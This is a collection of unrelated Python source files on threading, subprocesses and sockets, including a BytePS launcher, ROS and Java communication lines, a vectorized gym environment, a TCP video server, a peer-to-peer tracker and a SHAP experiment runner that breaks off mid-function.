source | python
|---|---|
launch.py
|
#!/usr/bin/python
from __future__ import print_function
import os
import subprocess
import threading
import sys
def worker(local_rank, local_size, command):
my_env = os.environ.copy()
my_env["BYTEPS_LOCAL_RANK"] = str(local_rank)
my_env["BYTEPS_LOCAL_SIZE"] = str(local_size)
if os.getenv("BYTEPS_ENABLE_GDB", 0):
if command.find("python") != 0:
command = "python " + command
command = "gdb -ex 'run' -ex 'bt' -batch --args " + command
subprocess.check_call(command, env=my_env, stdout=sys.stdout, stderr=sys.stderr, shell=True)
if __name__ == "__main__":
print("BytePS launching " + os.environ["DMLC_ROLE"])
sys.stdout.flush()
if os.environ["DMLC_ROLE"] == "worker":
if "NVIDIA_VISIBLE_DEVICES" in os.environ:
local_size = len(os.environ["NVIDIA_VISIBLE_DEVICES"].split(","))
else:
local_size = 1
t = [None] * local_size
for i in range(local_size):
command = ' '.join(sys.argv[1:])
t[i] = threading.Thread(target=worker, args=[i, local_size, command])
t[i].daemon = True
t[i].start()
for i in range(local_size):
t[i].join()
else:
# if "BYTEPS_SERVER_MXNET_PATH" not in os.environ:
# print("BYTEPS_SERVER_MXNET_PATH env not set")
# os._exit(0)
# sys.path.insert(0, os.getenv("BYTEPS_SERVER_MXNET_PATH"))
try:
import mxnet
except ImportError:
raise ImportError(
"Unable to import dependency mxnet. "
"A quick tip is to install via `pip install mxnet-mkl/mxnet-cu100mkl --pre`. "
"please refer to https://gluon-cv.mxnet.io/#installation for details.")
|
run_dash.py
|
import threading
import subprocess
import webbrowser
import time
def run_dash():
"""
Run the dash application in this function
and then open the dash url in a new window.
:return: None
"""
proc = subprocess.Popen(['python', './template/only_dash.py'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
t = threading.Thread(target=output_reader, args=(proc,))
t.start()
try:
time.sleep(3)
webbrowser.open('http://localhost:8050')
# assert b'Directory listing' in resp.read()
time.sleep(10)
finally:
proc.terminate()
try:
proc.wait(timeout=1)
print('== subprocess exited with rc = %d' % proc.returncode)
except subprocess.TimeoutExpired:
print('subprocess did not terminate in time')
t.join()
return None
# helper functions
def output_reader(proc):
"""
Check if subprocess works correctly.
:param proc: process
:return: None
"""
for line in iter(proc.stdout.readline, b''):
print('got line: {0}'.format(line.decode('utf-8')), end='')
if __name__ == "__main__":
run_dash()
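# Hedged sketch (an assumption, not part of this repo) of what ./template/only_dash.py
# might minimally contain for the flow above to work; it only needs to serve a Dash
# app on port 8050 so that webbrowser.open('http://localhost:8050') finds it:
#   import dash
#   from dash import html
#   app = dash.Dash(__name__)
#   app.layout = html.Div("Hello from only_dash.py")
#   if __name__ == "__main__":
#       app.run_server(port=8050)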
|
communication.py
|
#!/usr/bin/env python
"""Module for managing communication lines
Include class for Java and ROS communication
"""
import abc
from socket import socket, timeout
from threading import Thread
import sys
import time
from std_msgs.msg import String
from sonia_msgs.msg import filterchain_return_message as ret_str
import rospy
import time
from observer import Observable, Observer
import parser
# Set a buffer max size for input from socket and output to ROS line
BUFFER_SIZE = 2048
class AbstractCommunicationLine(Observable, Observer, Thread):
"""Abstract methods and attributes for base communication lines
This will provide a method send to send information on the line
and will run as a thread to get information from it
"""
__metaclass__ = abc.ABCMeta # ABC class behaves like abstract
def __init__(self):
"""Default constructor, start connexions
"""
Thread.__init__(self)
Observable.__init__(self)
Observer.__init__(self)
self._input_stream = []
self._output_stream = []
self._connected = False
self._running = False
self.daemon = True
self._connect()
self.start()
@abc.abstractmethod
def _connect(self):
"""
"""
raise NotImplementedError(
"Class %s doesn't implement connect()" % self.__class__.__name__)
@abc.abstractmethod
def _process(self):
"""Method launched when object.start() is called on the instanciated
object
"""
raise NotImplementedError(
"Class %s doesn't implement run()" % self.__class__.__name__)
def run(self):
"""Method launched when object.start() is called on the instanciated
object
"""
self._running = True
while self.is_running and not rospy.is_shutdown():
rate = rospy.Rate(28)
self._process()
rate.sleep()
self._running = False
def recv(self):
"""Read ouput stream and empty it
"""
tmp_input_stream = self._input_stream[0]
self._input_stream.remove(self._input_stream[0])
return tmp_input_stream
def stop(self):
"""Stop communication line
"""
self._running = False
@abc.abstractmethod
def send(self, data):
"""Send a message on the line
Abstract method to rewrite
"""
raise NotImplementedError(
"Class %s doesn't implement send()" % self.__class__.__name__)
@property
def is_empty(self):
"""Check if the input stream is empty
"""
if len(self._input_stream):
return False
return True
@property
def is_running(self):
"""Check if the input stream is empty
"""
return self._running
@property
def is_connected(self):
"""Check if the input stream is empty
"""
return self._connected
@abc.abstractmethod
def get_name(self):
raise NotImplementedError
def __exit__(self, exc_type, exc_val, exc_tb):
"""Default Destructor
Destroy the object correctly
"""
self.stop()
class JavaCommunicationLine(AbstractCommunicationLine):
"""An easy to use API for making a dialog on TCP/IP Line
This class is server class and provides reading and writing socket
"""
def __init__(self, host='', port=46626):
"""Default constructor
Initialize variables and call the parent constructor (which connects the socket)
"""
self.host = host
self.port = port
self._backlog = 5
self._socket = None
self._clients = []
self._started = False
AbstractCommunicationLine.__init__(self)
def _connect(self):
"""Connect to the client socket
"""
try:
self._socket = socket()
self._socket.bind((self.host, self.port))
self._socket.listen(self._backlog)
self._socket.settimeout(2)
self._socket.setblocking(1)
except:
if self._socket:
self._socket.close()
rospy.logerr('Could not open socket')
sys.exit(1)
rospy.loginfo(
'Socket server running at : ' +
str(self.host) + ":" + str(self.port))
# Always accept connections
self._connexion_thread = Thread(target=self._accept_client)
self._connexion_thread.daemon = True
self._connexion_thread.start()
def _accept_client(self):
while True:
client, client_ip = self._socket.accept()
self._clients = []
self._clients.append((client, client_ip))
rospy.loginfo(
'A client is connected : ' + str(self._clients[-1][1][0]) +
':' + str(self._clients[-1][1][1]))
def stop(self):
"""Close connexion properly
Override parent class to add socket closing process
"""
self._socket.close()
self._started = False
super(JavaCommunicationLine, self).stop()
def _process(self):
"""Method used by thread processing until stop() is used
Will read on the line and notify observer if there is any informations
"""
rospy.logwarn("BEFORE READLINE")
self._read_from_line()
rospy.logwarn("AFTER READLINE")
if not self.is_empty:
self._notify()
rospy.logwarn("BEFORE OUTPUT_STREAM")
if len(self._output_stream):
self._write_to_line()
def _read_from_line(self):
"""Read informations from tcp socket
"""
rospy.logwarn("number of clients : {!s}"
.format(self._clients.__len__()))
for client in self._clients:
try:
rospy.logwarn("123")
line = client[0].recv(2048)
"""line = client[0].makefile().readline().rstrip('\n')"""
rospy.logwarn("1234")
if line:
rospy.logwarn("1235")
rospy.loginfo("I received data from AUV6 : \"" + line + "\"")
if line == "END\n":
rospy.logwarn(
"The client {!s}:{!s} ended the connexion".format(
client[1][0], client[1][1]))
return
self._input_stream.append(line)
except:
rospy.logwarn(sys.exc_info()[0])
def _write_to_line(self):
for client in self._clients:
#rospy.loginfo(
# "I am Sending data to AUV6 on {!s}:{!s} : \"".format(
# client[1][0], client[1][1]) +
# self._output_stream[0] + "\"")
try:
client[0].send(self._output_stream[0] + "\n")
except:
rospy.logerr(
"The client {!s}:{!s} disconnected without "
.format(client[1][0], client[1][1]) +
"closing the connexion")
self._output_stream = self._output_stream[1:]
def send(self, data):
"""Send informations to tcp socket
"""
for client in self._clients:
#rospy.loginfo(
# "I am Sending data to AUV6 on {!s}:{!s} : \"".format(
# client[1][0], client[1][1]) +
# data + "\"")
try:
client[0].send(data + "\n")
except timeout:
rospy.logwarn("socket timeout ! Resetting connection ...")
self.stop()
self._connect()
except:
rospy.logerr(
"The client {!s}:{!s} disconnected without "
.format(client[1][0], client[1][1]) +
"closing the connexion")
rospy.logwarn(sys.exc_info()[0])
def get_name(self):
return "AUV6"
def update(self, subject):
#rospy.loginfo(
# "I am Sending data to AUV6 :::")
self.send(subject.recv())
class ROSTopicCommunicationLine(AbstractCommunicationLine):
"""Initiate a communication with ROS Topic given a writing
and reading topic node_name
"""
def __init__(self, reading_topic, writing_topic=None):
"""Default Constructor
init node and topics
"""
self._writing_topic = writing_topic
self._reading_topic = reading_topic
AbstractCommunicationLine.__init__(self)
def _connect(self):
"""
"""
rospy.loginfo(
"I am subscribing to ROS reading topic : " + self._reading_topic)
rospy.Subscriber(
self._reading_topic, ret_str, self._handle_read_subscribers)
if self._writing_topic:
rospy.loginfo(
"I am subscribing to ROS writing topic : " +
self._writing_topic)
self.publisher = rospy.Publisher(
self._writing_topic, String, queue_size=20)
def _process(self):
"""Method used by thread
publishes any queued output on the writing topic
"""
if len(self._output_stream):
if self._writing_topic:
rospy.loginfo(
"I am sending data to ROS Topic : \"" +
self._output_stream[0] + "\"")
self.publisher.publish(self._output_stream[0])
self._output_stream = self._output_stream[1:]
else:
rospy.logerr(
"Sorry, you did not provide me any topic to publish on...")
def _handle_read_subscribers(self, data):
"""Method called when receiving informations from Subscribers
"""
self._input_stream.append(data.execution_result)
rospy.loginfo(
"I received data from ROS Topic : \"" +
self._input_stream[-1] +
"\" - ["+ data.execution_result +"] "
)
self._notify()
def stopTopic(self):
self.stop()
def send(self, data):
"""Send informations to publisher
"""
self._output_stream.append(data)
def get_name(self):
return self._reading_topic
class ROSServiceCommunicationLine(AbstractCommunicationLine):
"""Initiate a communication with ROS given a service service_name
"""
def __init__(self, service_name, service_ref):
"""Default constructor subscribe to service
"""
self._service_name = service_name
self._service_ref = service_ref
AbstractCommunicationLine.__init__(self)
def _connect(self):
"""
"""
rospy.loginfo("I am connecting to Vision Server ROS service")
self._service_response = rospy.ServiceProxy(
self._service_name, self._service_ref)
def _process(self):
"""Method used by thread
sends queued requests to the service and collects the responses
"""
if len(self._output_stream):
rospy.wait_for_service(self._service_name)
try:
rospy.loginfo(
"I am sending data to Vision Server : \"" +
"node_name : " + self._output_stream[0][0] +
" filterchain_name : " + self._output_stream[0][1] +
" media_name : " + self._output_stream[0][2] +
" cmd : " + str(self._output_stream[0][3]) + "\"")
self._input_stream.append(str(self._service_response(
self._output_stream[0][0], self._output_stream[0][1],
self._output_stream[0][2], self._output_stream[0][3])))
self._output_stream = self._output_stream[1:]
if not self.is_empty:
rospy.loginfo(
"I received data from Vision Server : \"" +
self._input_stream[-1] + "\"")
self._notify()
except rospy.ServiceException as e:
rospy.logerr("Service call failed: %s" % e)
def send(self, node_name, filterchain_name, media_name, cmd):
"""Loop and get information from service
"""
self._output_stream.append((
node_name, filterchain_name, media_name, cmd))
def update(self, subject):
"""
"""
splitted = subject.recv().split("\n")
for line in splitted:
parsed_str = parser.parse_from_java(line)
if parsed_str is not None:
print("sending informations")
self.send(parsed_str[0], parsed_str[1], parsed_str[2], parsed_str[3])
def get_name(self):
return self._service_name
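if __name__ == "__main__":
    # Hedged sketch (not part of the original module): the minimum a concrete
    # line must provide is _connect, _process, send and get_name; the class
    # below is illustrative only and is never instantiated here.
    class LoopbackCommunicationLine(AbstractCommunicationLine):
        def _connect(self):
            self._connected = True
        def _process(self):
            pass
        def send(self, data):
            self._input_stream.append(data)
        def get_name(self):
            return "loopback"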
|
subproc_vec_env.py
|
import multiprocessing as mp
from collections import OrderedDict
from typing import Any, Callable, List, Optional, Sequence, Tuple, Type, Union
import gym
import numpy as np
from hmlf import spaces
from hmlf.environments.vec_env.base_vec_env import CloudpickleWrapper, VecEnv, VecEnvIndices, VecEnvObs, VecEnvStepReturn
def _worker(
remote: mp.connection.Connection, parent_remote: mp.connection.Connection, env_fn_wrapper: CloudpickleWrapper
) -> None:
# Import here to avoid a circular import
from hmlf.common.env_util import is_wrapped
parent_remote.close()
env = env_fn_wrapper.var()
while True:
try:
cmd, data = remote.recv()
if cmd == "step":
observation, reward, done, info = env.step(data)
if done:
# save final observation where user can get it, then reset
info["terminal_observation"] = observation
observation = env.reset()
remote.send((observation, reward, done, info))
elif cmd == "seed":
remote.send(env.seed(data))
elif cmd == "reset":
observation = env.reset()
remote.send(observation)
elif cmd == "render":
remote.send(env.render(data))
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.observation_space, env.action_space))
elif cmd == "env_method":
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == "get_attr":
remote.send(getattr(env, data))
elif cmd == "set_attr":
remote.send(setattr(env, data[0], data[1]))
elif cmd == "is_wrapped":
remote.send(is_wrapped(env, data))
else:
raise NotImplementedError(f"`{cmd}` is not implemented in the worker")
except EOFError:
break
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments, distributing each environment to its own
process, allowing significant speed up when the environment is computationally complex.
For performance reasons, if your environment is not IO bound, the number of environments should not exceed the
number of logical cores on your CPU.
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow sessions or other non thread-safe
libraries are used in the parent (see issue #217). However, compared to
'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods, users must wrap the code in an
``if __name__ == "__main__":`` block.
For more information, see the multiprocessing documentation.
:param env_fns: Environments to run in subprocesses
:param start_method: method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'forkserver' on available platforms, and 'spawn' otherwise.
"""
def __init__(self, env_fns: List[Callable[[], gym.Env]], start_method: Optional[str] = None):
self.waiting = False
self.closed = False
n_envs = len(env_fns)
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
forkserver_available = "forkserver" in mp.get_all_start_methods()
start_method = "forkserver" if forkserver_available else "spawn"
ctx = mp.get_context(start_method)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes, env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = ctx.Process(target=_worker, args=args, daemon=True) # pytype:disable=attribute-error
process.start()
self.processes.append(process)
work_remote.close()
self.remotes[0].send(("get_spaces", None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions: np.ndarray) -> None:
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self) -> VecEnvStepReturn:
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs, self.observation_space), np.stack(rews), np.stack(dones), infos
def seed(self, seed: Optional[int] = None) -> List[Union[None, int]]:
for idx, remote in enumerate(self.remotes):
remote.send(("seed", seed + idx))
return [remote.recv() for remote in self.remotes]
def reset(self) -> VecEnvObs:
for remote in self.remotes:
remote.send(("reset", None))
obs = [remote.recv() for remote in self.remotes]
return _flatten_obs(obs, self.observation_space)
def close(self) -> None:
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for process in self.processes:
process.join()
self.closed = True
def get_images(self) -> Sequence[np.ndarray]:
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(("render", "rgb_array"))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self, attr_name: str, indices: VecEnvIndices = None) -> List[Any]:
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("get_attr", attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self, attr_name: str, value: Any, indices: VecEnvIndices = None) -> None:
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("set_attr", (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self, method_name: str, *method_args, indices: VecEnvIndices = None, **method_kwargs) -> List[Any]:
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("env_method", (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def env_is_wrapped(self, wrapper_class: Type[gym.Wrapper], indices: VecEnvIndices = None) -> List[bool]:
"""Check if worker environments are wrapped with a given wrapper"""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("is_wrapped", wrapper_class))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices: VecEnvIndices) -> List[Any]:
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: refers to indices of envs.
:return: Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
def _flatten_obs(obs: Union[List[VecEnvObs], Tuple[VecEnvObs]], space: spaces.Space) -> VecEnvObs:
"""
Flatten observations, depending on the observation space.
:param obs: observations.
A list or tuple of observations, one per environment.
Each environment observation may be a NumPy array, or a dict or tuple of NumPy arrays.
:return: flattened observations.
A flattened NumPy array or an OrderedDict or tuple of flattened numpy arrays.
Each NumPy array has the environment index as its first axis.
"""
assert isinstance(obs, (list, tuple)), "expected list or tuple of observations per environment"
assert len(obs) > 0, "need observations from at least one environment"
if isinstance(space, spaces.Dict):
assert isinstance(space.spaces, OrderedDict), "Dict space must have ordered subspaces"
assert isinstance(obs[0], dict), "non-dict observation for environment with Dict observation space"
return OrderedDict([(k, np.stack([o[k] for o in obs])) for k in space.spaces.keys()])
elif isinstance(space, spaces.Tuple):
assert isinstance(obs[0], tuple), "non-tuple observation for environment with Tuple observation space"
obs_len = len(space.spaces)
return tuple((np.stack([o[i] for o in obs]) for i in range(obs_len)))
else:
return np.stack(obs)
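if __name__ == "__main__":
    # Hedged usage sketch (not part of the original module); "CartPole-v1" is an
    # arbitrary example id. The __main__ guard is required by the 'spawn' and
    # 'forkserver' start methods, as the class docstring above explains.
    env_fns = [lambda: gym.make("CartPole-v1") for _ in range(4)]
    vec_env = SubprocVecEnv(env_fns, start_method="spawn")
    observations = vec_env.reset()
    vec_env.close()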
|
email.py
|
from threading import Thread
from flask_mail import Message
from flask import current_app, render_template
#from . import mail
def send_async_mail(message):
#with app.app_context():
#mail.send(message)
pass
def welcome_mail(user):
message = Message('Bienvenido!',
sender=current_app.config['MAIL_USERNAME'],
recipients=[user.email])
message.html = render_template('email/welcome.html', user=user)
thread = Thread(target=send_async_mail, args=[message])
thread.start()
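# Hedged completion sketch, based on the commented-out lines above (assumes the
# package-level `mail` import is restored):
#   def send_async_mail(app, message):
#       with app.app_context():
#           mail.send(message)
# welcome_mail would then also pass current_app._get_current_object() to the thread.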
|
VideoServer.py
|
import netifaces
import SocketServer,threading
# Network stream object.
# Open a server to send bytes to clients.
def getPreferredIp( ) :
for myIf in ['eth0', 'wlan0']:
try:
iface = netifaces.ifaddresses(myIf).get(netifaces.AF_INET)
if iface is None:
continue
print "Iface is %s" % iface
# Assume first hardware card on interface...
myAddress = iface[0]['addr']
return myAddress
except ValueError:
continue
raise ValueError("No Interface found")
_videoServer = None
# Thread created when a new connection is made to the socket.
# The write method sends data to the client connection. (We're the server)
class ServerInstance(SocketServer.StreamRequestHandler):
def handle( self ) :
_videoServer.add (self)
try:
while True:
self.data = self.rfile.readline()
if self.data == '' :
break
finally:
self.rfile.close()
_videoServer.remove(self)
def write ( self, data ):
self.wfile.write ( data )
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
# The camera calls this when it has new data to transmit to the
# attached clients.
# Note that this is a singleton.
#
class VideoServer :
def __init__ ( self ):
global _videoServer
if _videoServer:
raise ValueError ("Video Server already created")
_videoServer = self
self.connections = list()
self.portNumber = 8000
self.host = getPreferredIp()
self.server = None
self.server_thread = None
# Broadcast data to connections.
def write (self,data):
for c in self.connections:
try:
c.write( data )
except:
pass
# Remove connection from list.
def remove ( self, connection):
self.connections.remove (connection)
# Add connection to list
def add ( self, connection):
self.connections.append(connection)
def start ( self ):
self.server = ThreadedTCPServer ((self.host,self.portNumber), ServerInstance)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon=True
self.server_thread.start()
# Not implemented.
def finish ( self):
pass
class GetVsPort:
def __init__(self, vs ):
self.vs = vs
def run ( self, string , tokens ) :
return str(self.vs.portNumber)
class SetVsPort:
def __init__(self, vs ):
self.vs = vs
def run ( self, string , tokens ) :
try:
value = int(tokens[1])
self.vs.portNumber = value
except:
pass
return str(self.vs.portNumber)
def initVideoServer( myHandler ):
vs = VideoServer ( )
myHandler.addInstance ( 'getvsport' , GetVsPort (vs))
myHandler.addInstance ( 'setvsport' , SetVsPort (vs))
vs.start()
return vs
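# Hedged usage sketch (the command handler and the capture loop are assumptions,
# not part of this module):
#   vs = initVideoServer(myCommandHandler)
#   while capturing:
#       vs.write(encodedFrameBytes)  # broadcast each new frame to every attached client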
|
main.py
|
import logging
import os
import socket
import sys
import threading
from client_connection import PeerConnectionThread, TrackerConnectionThread
from pathlib import Path
from db_operations import DataBase
from models.peer_info import PeerInfo
from peer import Peer
from models.product import Product
from tracker import Tracker
from uuid import uuid4
HOST, PORT = "0.0.0.0", 23456
killswitch = False
current_path = str(Path(__file__))
log_dir = os.path.join(os.path.normpath(current_path + os.sep + os.pardir), "logs")
log_fname = os.path.join(log_dir, "tracker.log")
os.makedirs(os.path.dirname(log_fname), exist_ok=True)
logging.basicConfig(
filename=log_fname,
filemode="a",
format="%(asctime)s - %(levelname)s - %(message)s",
datefmt="%d-%b-%y %H:%M:%S",
level=logging.DEBUG,
)
def start_tracker():
global killswitch
tracker = Tracker(uuid4(), HOST, PORT, geoloc="Istanbul")
all_threads = []
with socket.socket() as server_socket:
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((HOST, PORT))
server_socket.listen(0)
# server_socket.settimeout(10)
logging.debug("Tracker starting up...")
print("racker starting up...")
print("Listening...")
while True:
try:
(client_socket, client_address) = server_socket.accept()
logging.info(f"New connection from IP:{client_address[0]}")
client_socket.settimeout(0.8)
new_thread = TrackerConnectionThread(
tracker, client_socket, client_address
)
all_threads.append(new_thread)
new_thread.start()
if killswitch:
break
except socket.timeout:
#print("Timeout! Tracker shutting down...", e)
#logging.debug("Timeout! Tracker shutting down...")
#return
if killswitch:
break
else:
continue
except KeyboardInterrupt:
for thread in all_threads:
thread.join()
logging.debug("Tracker shutting down...")
return
peer = None
def start_intelligent_home():
global peer
global killswitch
if len(sys.argv) < 4:
info()
raise Exception("Command line expect tracker ip and port")
all_threads = []
PORT = port = int(sys.argv[3])
HOST = host = sys.argv[2]
dbname = "mydb"
if len(sys.argv) == 5:
dbname = sys.argv[4]
peer = Peer(uuid4(), host, port, geoloc="Istanbul")
db = DataBase(db_name=dbname)
for raw_peer_info in db.read_peers_as_list():
name,uuid,ip,port,desc,location = raw_peer_info
peer_info = PeerInfo(uuid,ip,port,location,"A",keywords=name+desc)
peer.register(peer_info)
for product_info in db.read_products_as_list():
p_name, p_unit, p_desc, p_amount = product_info
keywords = [kw.strip().lower() for kw in p_desc.split(",")]
new_product = Product(p_name, p_unit, p_amount, keywords)
peer.add_product(new_product)
with socket.socket() as server_socket:
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((HOST, PORT))
server_socket.listen(0)
server_socket.settimeout(1)
print("Listening...")
while True:
try:
(client_socket, client_address) = server_socket.accept()
#client_socket.settimeout(0.8)
if client_address in peer.block_list:
client_socket.send("BL::T\n".encode())
client_socket.close()
logging.info(f"Rejeted connection from blocked IP:{client_address[0]}")
continue
logging.info(f"New connection from IP:{client_address[0]}")
new_thread = PeerConnectionThread(peer, client_socket, client_address)
all_threads.append(new_thread)
new_thread.start()
if killswitch:
break
except socket.timeout as e:
if killswitch:
break
else:
continue
except KeyboardInterrupt:
for thread in all_threads:
thread.join()
logging.debug("Tracker shutting down...")
return
for thread in all_threads:
thread.is_listening = False
thread.join()
# To start Peer use -a command line
def info():
print(
"Arguments: [node option] [connection option]",
"node option for peer: -a , connection option: {ip} {port}",
"node option for tracker: -t",
sep="\n",
)
def main():
global killswitch
if len(sys.argv) == 1:
info()
return
elif sys.argv[1] == "-t":
start_tracker()
elif sys.argv[1] == "-a":
peer_thread = threading.Thread(target=start_intelligent_home)
peer_thread.start()
from app import AppUi
while peer is None:
pass
app_ui = AppUi(peer)
app_ui.run()
killswitch = True
peer_thread.join()
if __name__ == "__main__":
main()
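# Hedged invocation examples based on info() above (addresses and the db name
# are placeholders):
#   python main.py -t                       # run as the tracker (binds 0.0.0.0:23456)
#   python main.py -a 127.0.0.1 23457       # run as a peer using the given ip/port
#   python main.py -a 127.0.0.1 23457 mydb  # optional 4th argument picks the database name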
|
experiments.py
|
from __future__ import print_function
from .. import datasets
from . import metrics
from . import models
from . import methods
from .. import __version__
import numpy as np
import sklearn
import os
import pickle
import sys
import time
import subprocess
from multiprocessing import Pool
import itertools
import copy
import random
try:
from queue import Queue
except ImportError:
from Queue import Queue
from threading import Thread, Lock
regression_metrics = [
"runtime",
"local_accuracy",
"consistency_guarantees",
"mask_keep_positive",
"mask_keep_negative",
"keep_positive",
"keep_negative",
"batch_keep_absolute__r2",
"mask_remove_positive",
"mask_remove_negative",
"remove_positive",
"remove_negative",
"batch_remove_absolute__r2"
]
binary_classification_metrics = [
"runtime",
"local_accuracy",
"consistency_guarantees",
"mask_keep_positive",
"mask_keep_negative",
"keep_positive",
"keep_negative",
"batch_keep_absolute__roc_auc",
"mask_remove_positive",
"mask_remove_negative",
"remove_positive",
"remove_negative",
"batch_remove_absolute__roc_auc"
]
linear_regress_methods = [
"linear_shap_corr",
"linear_shap_ind",
"coef",
"random",
"kernel_shap_1000_meanref",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
#"sampling_shap_100"
]
linear_classify_methods = [
# NEED LIME
"linear_shap_corr",
"linear_shap_ind",
"coef",
"random",
"kernel_shap_1000_meanref",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
#"sampling_shap_100"
]
tree_regress_methods = [
# NEED tree_shap_ind
# NEED split_count?
"tree_shap",
"saabas",
"random",
"tree_gain",
"kernel_shap_1000_meanref",
"mean_abs_tree_shap",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
#"sampling_shap_100"
]
tree_classify_methods = [
# NEED tree_shap_ind
# NEED split_count?
"tree_shap",
"saabas",
"random",
"tree_gain",
"kernel_shap_1000_meanref",
"mean_abs_tree_shap",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
#"sampling_shap_100"
]
deep_regress_methods = [
"deep_shap",
"expected_gradients",
"random",
"kernel_shap_1000_meanref",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
]
_experiments = []
_experiments += [["corrgroups60", "lasso", m, s] for s in regression_metrics for m in linear_regress_methods]
_experiments += [["corrgroups60", "ridge", m, s] for s in regression_metrics for m in linear_regress_methods]
_experiments += [["corrgroups60", "decision_tree", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["corrgroups60", "random_forest", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["corrgroups60", "gbm", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["corrgroups60", "ffnn", m, s] for s in regression_metrics for m in deep_regress_methods]
_experiments += [["cric", "lasso", m, s] for s in binary_classification_metrics for m in linear_classify_methods]
_experiments += [["cric", "ridge", m, s] for s in binary_classification_metrics for m in linear_classify_methods]
_experiments += [["cric", "decision_tree", m, s] for s in binary_classification_metrics for m in tree_regress_methods]
_experiments += [["cric", "random_forest", m, s] for s in binary_classification_metrics for m in tree_regress_methods]
_experiments += [["cric", "gbm", m, s] for s in binary_classification_metrics for m in tree_regress_methods]
#_experiments += [["cric", "ffnn", m, s] for s in binary_classification_metrics for m in deep_regress_methods]
def experiments(dataset=None, model=None, method=None, metric=None):
for experiment in _experiments:
if dataset is not None and dataset != experiment[0]:
continue
if model is not None and model != experiment[1]:
continue
if method is not None and method != experiment[2]:
continue
if metric is not None and metric != experiment[3]:
continue
yield experiment
def run_experiment(experiment, use_cache=True, cache_dir="/tmp"):
dataset_name, model_name, method_name, metric_name = experiment
# see if we have a cached version
cache_id = __gen_cache_id(experiment)
cache_file = os.path.join(cache_dir, cache_id + ".pickle")
if use_cache and os.path.isfile(cache_file):
with open(cache_file, "rb") as f:
#print(cache_id.replace("__", " ") + " ...loaded from cache.")
return pickle.load(f)
# compute the scores
print(cache_id.replace("__", " ") + " ...")
sys.stdout.flush()
start = time.time()
X,y = getattr(datasets, dataset_name)()
score = getattr(metrics, metric_name)(
X, y,
getattr(models, dataset_name+"__"+model_name),
method_name
)
print("...took %f seconds.\n" % (time.time() - start))
# cache the scores
with open(cache_file, "wb") as f:
pickle.dump(score, f)
return score
def run_experiments_helper(args):
experiment, cache_dir = args
return run_experiment(experiment, cache_dir=cache_dir)
def run_experiments(dataset=None, model=None, method=None, metric=None, cache_dir="/tmp", nworkers=1):
experiments_arr = list(experiments(dataset=dataset, model=model, method=method, metric=metric))
if nworkers == 1:
out = list(map(run_experiments_helper, zip(experiments_arr, itertools.repeat(cache_dir))))
else:
with Pool(nworkers) as pool:
out = pool.map(run_experiments_helper, zip(experiments_arr, itertools.repeat(cache_dir)))
return list(zip(experiments_arr, out))
nexperiments = 0
total_sent = 0
total_done = 0
total_failed = 0
host_records = {}
worker_lock = Lock()
ssh_conn_per_min_limit = 5
def __thread_worker(q, host):
global total_sent, total_done
hostname, python_binary = host.split(":")
while True:
experiment = q.get()
# make sure we are not sending too many ssh connections to the host
while True:
all_clear = False
worker_lock.acquire()
try:
if hostname not in host_records:
host_records[hostname] = []
if len(host_records[hostname]) < ssh_conn_per_min_limit:
all_clear = True
elif time.time() - host_records[hostname][-ssh_conn_per_min_limit] > 60:
all_clear = True
finally:
worker_lock.release()
# if we are clear to send a new ssh connection then break
if all_clear:
break
# if we are not clear then we sleep and try again
time.sleep(5)
# record how many we have sent off for execution
